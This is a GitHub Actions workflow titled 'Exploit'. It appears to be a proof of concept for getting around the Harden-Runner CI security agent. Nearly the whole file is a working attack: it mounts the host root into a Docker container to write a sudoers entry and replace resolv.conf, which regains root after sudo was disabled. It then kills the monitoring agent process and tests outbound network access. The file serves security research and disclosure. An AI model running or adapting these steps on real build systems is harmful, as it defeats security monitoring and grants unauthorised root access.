name: Exploit

on:
  workflow_dispatch:
    inputs:
      kill:
        description: 'Kill the runner'
        required: false
        default: false
        type: boolean
jobs:
  test:
    runs-on: ubuntu-latest
    steps:  
    - name: Harden Runner
      uses: step-security/harden-runner@c95a14d0e5bab51a9f56296a4eb0e416910cd350 # v2.10.3
      with:
        egress-policy: audit
        disable-sudo: true
    
    - name: Can I sudo?
      shell: bash
      continue-on-error: true
      run: |
        set -x
        # we should not be able to sudo
        sudo whoami

    - name: Before
      shell: bash
      run: |
          set -x
          cat /tmp/runner
          ls -al /etc/sudoers
          ls -al /tmp/
          ls -al /tmp/runner
          ls -al /home/agent/*
          cat /etc/docker/daemon.json
          ls -al /etc/res*
          cat /etc/resolv.conf

    - name: Tamper with the runner
      shell: bash
      run: |
        set -x

        # Create script to be run in root and privileged container
        exploit=$(cat << 'EOF'
        cp /host/tmp/runner /host/etc/sudoers.d/runner
        cp /host/tmp/resolved.conf /host/etc/resolv.conf
        EOF
        )

        echo "$exploit" > /tmp/exploit.sh
        chmod 777 /tmp/exploit.sh
        cat /tmp/exploit.sh

        # Run the script in the root and privileged container
        docker run --rm -v /:/host ubuntu bash /host/tmp/exploit.sh

    - name: After
      shell: bash
      continue-on-error: true
      run: |
        set -x
        sudo cat /etc/sudoers.d/runner
        sudo cat /etc/resolv.conf
        sudo whoami

    - name: Kill
      shell: bash
      run: |
        pid=$(ps aux | grep /home/agent/agent | grep -v grep | awk '{print $2}')
        echo "Killing $pid"
        sudo kill -9 $pid

    - name: Can access example.com
      shell: bash
      run: |
        set -x
        curl example.com

